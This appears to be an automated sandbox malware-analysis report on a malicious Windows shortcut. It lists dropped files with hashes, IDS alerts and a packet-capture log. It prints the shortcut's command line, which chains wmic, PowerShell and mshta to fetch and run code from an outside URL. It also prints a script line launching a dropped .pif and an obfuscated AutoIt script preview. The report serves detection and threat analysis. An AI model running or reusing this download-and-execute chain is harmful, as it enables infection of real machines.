                                                                                                                  SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                                                                  MD5:C3FEDB046D1699616E22C50131AAF109
                                                                                                                  SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                                                                  SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                                                                  SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                                                                  Malicious:false
                                                                                                                  Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29752
                                                                                                                  Entropy (8bit):5.4030778570616524
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cb7cbSIkmcbl:ceo4+rsCmkp
                                                                                                                  MD5:0EEE66FD8068B10002BC42EED6F83CF7
                                                                                                                  SHA1:958B421FC44B5C47644354961722BB052EBAF32C
                                                                                                                  SHA-256:967BB8A4A136169253A8C5056671419446B9E352BBAA4EA532D3963186E49E2B
                                                                                                                  SHA-512:F55DDDFDC8E4607431BBDEB79D256EF974A4905FE8DE6FE353B903F61C1B9F69E5F67235D1B608F56B17AD99280EDEE82C028FCCE5F796333F7CEE707ACAB446
                                                                                                                  Malicious:false
                                                                                                                  Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1150516
                                                                                                                  Entropy (8bit):5.1985967980924315
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:D8V+jcfSplhi959S1mg+PL9KBZ9kt41MgsUWiOl08zHBhk/d:DcElo59TZAZ9ssWDphk1
                                                                                                                  MD5:55D1A9399574865BEBB619F4657D1701
                                                                                                                  SHA1:AB34EFF18C5446892E0F0F5910BE6E245305CF99
                                                                                                                  SHA-256:A3EAEC0D05B9C829161AAF5D6A27AD5B434D4BE6F5A51376467968413B30749E
                                                                                                                  SHA-512:BFB3A5543E2152AE7D9B3F7D81FF67C7B07213BFBB2C59397328A106882340CC4BB1A996CF5D3C9633634F512EAB3872379927402B983520F0D0439E127A1AE9
                                                                                                                  Malicious:false
                                                                                                                  Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):186
                                                                                                                  Entropy (8bit):4.761058342183721
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:RiMIpGXfeNH5E5wWAX+TSyCVVh4EkD5yKXW/Zi+0/RaMl85uWAX+TSyCVVh4EkDO:RiJbNHCwWDmLJkDrXW/Zz0tl8wWDmLJX
                                                                                                                  MD5:6B09F9AC501B58CCD5BC08B41FF85624
                                                                                                                  SHA1:95272508F2347856331B1017A86F63B5F87FCD68
                                                                                                                  SHA-256:D5F306EB2125F34C25704C8B9611AA1367A772EF02D7BAA1789D8C7026D17BE6
                                                                                                                  SHA-512:721BD6DA01A3DC639958E2D801C1A10B7E0B9D4363B4182219BD6261737D67B172236DC2C651DC753DC91DE6CEB94B74977E8EF1578A262EF5D27A6DC2F428D2
                                                                                                                  Malicious:true
                                                                                                                  Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                                                                  Process:C:\Users\Public\Guard.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1083904
                                                                                                                  Entropy (8bit):6.306372955812324
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:XrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaA1v:X2EYTb8atv1orq+pEiSDTj1VyvBay
                                                                                                                  MD5:9624FB616EDBE0DBAFD24F26424CA9E8
                                                                                                                  SHA1:4038ACA3595AD6604148DEF2BEEDB6AD72FCC4E7
                                                                                                                  SHA-256:E507B2CF8FE1A856187F471A08AF108388F2A8753AF5AF0EFF1937073428A07C
                                                                                                                  SHA-512:A9E8FB10337A3811D0FE37B51598834A746C7887F4617C7BF7BB9F963DE7EC7A612E7C103B8E7EE2B89B1816182EE33D9BC5A07D5108AF5DA228733BACA4C188
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PDF document, version 1.6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3438614
                                                                                                                  Entropy (8bit):7.565365361527372
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:GtZNvjFRGx8mEuSEEBWfJoGnihnR3YSnyYbAYFdhzQCnGkH:GtZJFRGxZEuSEEBE6GkR3YSnyuFsXkH
                                                                                                                  MD5:13E442980DFB1FED9EE67DD9CE5C165D
                                                                                                                  SHA1:958D4B5F59CF46E817461DD2C67CDE1106FFE508
                                                                                                                  SHA-256:3D80994983233EE77AF8200DC292C95D12AD7DF091BB3FB83DA6613CE74D6CCE
                                                                                                                  SHA-512:AE9A6CEE5FAC67C3623EC5F51FF053BA47B9B4C0F811FDDA9DF290AF53923F3184771F31E1F62F889164508334E1C44407EBF0DC038FC116C1A7826625E0FE2F
                                                                                                                  Malicious:false
                                                                                                                  Preview:%PDF-1.6.%.....1 0 obj.<<./Type /Catalog./Version /1.6./Pages 2 0 R.>>.endobj.6 0 obj.<<./Length 526549./Type /XObject./Subtype /Image./Filter /DCTDecode./BitsPerComponent 8./Width 2480./Height 3508./ColorSpace /DeviceRGB.>>.stream.......+Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2024:12:13 16:15:59..................................................................................&.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................q.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5.
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):99
                                                                                                                  Entropy (8bit):4.943821049972357
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5yKXW/Zi+URAAy:HRYF5yjoCHhJ23yKXW/Zzyy
                                                                                                                  MD5:837A8AFA0534369AF64741AFD86F5093
                                                                                                                  SHA1:7569D32D0ADD2EEE25705C4BC101B7898D357370
                                                                                                                  SHA-256:C13B04EFBFBFB63EE7B34BB6DD95A7C433C3A81BB08BCB3DE97334D2146EFB81
                                                                                                                  SHA-512:5A34E5614CD2E6E034FD4F3E5065E4F22E7B5BA7B3EED6A5E693C3291ED6C4717DCCEE898BB98547BE6F09277D1CAD8DDA4C104E318E4D5971D67B63405D9910
                                                                                                                  Malicious:true
                                                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):2464
                                                                                                                  Entropy (8bit):3.2444115126717215
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:QOaqdmuF3rHlp+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVM:FaqdF7Fp+AAHdKoqKFxcxkFfj
                                                                                                                  MD5:725CE985A995686F5BD1F350325641C9
                                                                                                                  SHA1:51B43AAD2EE2E56DBC384FCFD9AA3131A5876380
                                                                                                                  SHA-256:6EC6E55FB8FF45AB9F29967CAF49A7DA3C51D16A12949CF8511A6851FD9D7168
                                                                                                                  SHA-512:E7B8246AC37DA265A6ABA1D32B5DC613EB97BA96A91BA57B8FE6F302E97984575E60F39D6B1754D156F35E74A8A13088FE97003399CE6B9CE02C37D1B1566B97
                                                                                                                  Malicious:false
Preview:....-------------------------------------------------------------------------------------..MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable.. Start Time: Mon Dec 23 2024 01:08:31....MpEnsureProcessMitigationPolicy: hr = 0x1..WDEnable..*********************************** WSC State Info *************************..*********************************** AntiVirusProduct *************************..displayName = [Windows Defender]..pathToSignedProductExe = [windowsd
                                                                                                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):160
                                                                                                                  Entropy (8bit):5.083203110114614
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MghcV4oO6JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egKVldeF
                                                                                                                  MD5:7DCEEBAC7525469D3B0D7EB73B62F6C2
                                                                                                                  SHA1:CF1114FB069D13D948E4D5518CB3D4C331422B9E
                                                                                                                  SHA-256:B9EC374FDCF97E09BD6E212DE87EA708D16A3BBD0465C80FAAD9046D84A554DB
                                                                                                                  SHA-512:71BC58668CB933C7C23FB68B91C24E607EAA4952536BCBC39EE6ACA4765C332B93157C5E63420B7615A4D07D5C9539CBF2AECAB7176DDD1A2105F4A24A7F3336
                                                                                                                  Malicious:false
                                                                                                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 3904;...ReturnValue = 0;..};....
                                                                                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                  Entropy (8bit):2.6407269520113723
                                                                                                                  TrID:
                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                  File name:lKin1m7Pf2.lnk
                                                                                                                  File size:1'912 bytes
                                                                                                                  MD5:2ddf3f1022cce6aa5fd6c09b5275e47e
                                                                                                                  SHA1:13c4b35087244077015a33b25d2ab5f054f44988
                                                                                                                  SHA256:7ffbec4e1d8aacb3a386573d2c90ab9d1d89605a82ecd7dc524c178377ac6043
                                                                                                                  SHA512:bbdd716176b4f320d464972bbb519064a37ce457378d93275047dcb02588f3b3740b15cef0771a0a0758723428bf52bcda505fc1e3f84261a8fbab9426bb8c72
                                                                                                                  SSDEEP:24:8AyH/BUlgKN4ee+/31kWNdk6Zoc6dhqdd79dsrabqyI+pu:89uGep1ldkU6dMdJ9Aaey3w
                                                                                                                  TLSH:62415E041AE94B20F3B78E72547AB321897F7C5ADD728F1C018186892532A20E875F6B
                                                                                                                  File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                                  General

                                                                                                                  Relative Path:..\..\..\..\Windows\System32\Wbem\wmic.exe
                                                                                                                  Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/duychuan1')"
                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T07:07:55.769895+0100 | 2026434 | ET MALWARE VBScript Redirect Style Exe File Download | 1 | 147.45.49.155 | 443 | 192.168.2.8 | 49704 | TCP
2024-12-23T07:08:09.118490+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49713 | 147.45.49.155 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Dec 23, 2024 07:07:56.153629065 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.153636932 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.153666973 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.153691053 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.164063931 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.164083958 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.164149046 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.164155006 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.164215088 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.172894955 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.172914028 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.172976017 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.172982931 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.173027039 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.183242083 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.183259964 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.183336973 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.183345079 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.183366060 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.183381081 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.308042049 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.308073044 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.308135986 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.308150053 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.308173895 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.308201075 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.314436913 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.314472914 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.314515114 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.314523935 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.314551115 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.314570904 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.321434021 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.321451902 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.321516037 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.321523905 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.321563005 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.328542948 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.328563929 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.328650951 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.328658104 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.328701973 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.334808111 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.334825993 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.334887028 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.334894896 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.334938049 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.341398001 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.341417074 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.341470003 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.341476917 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.341505051 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.341531038 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.348653078 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.348670006 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.348735094 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.348742962 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.348781109 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.354609966 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.354659081 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.354674101 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.354680061 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.354703903 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:56.354705095 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.354722977 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.354758024 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.355051041 CET49704443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:56.355067015 CET44349704147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:58.503707886 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:58.503776073 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:07:58.503922939 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:58.516693115 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:07:58.516724110 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.025973082 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.026215076 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.027874947 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.027892113 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.028155088 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.034779072 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.075339079 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.637130022 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.688961029 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.829543114 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829615116 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829632998 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829643965 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.829680920 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829727888 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829744101 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.829744101 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.829756975 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.829790115 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.829790115 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.879579067 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.879601955 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.879656076 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.879667044 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:00.879688978 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:00.879719019 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.025259018 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.025288105 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.025424957 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.025424957 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.025444031 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.025546074 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.063213110 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.063287973 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.063332081 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.063349009 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.063402891 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.063402891 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.088134050 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.088202000 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.088242054 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.088254929 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.088279963 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.088335991 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.140875101 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.140906096 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.140974998 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.140993118 CET44349708147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:01.141040087 CET49708443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:01.141040087 CET49708443192.168.2.8147.45.49.155
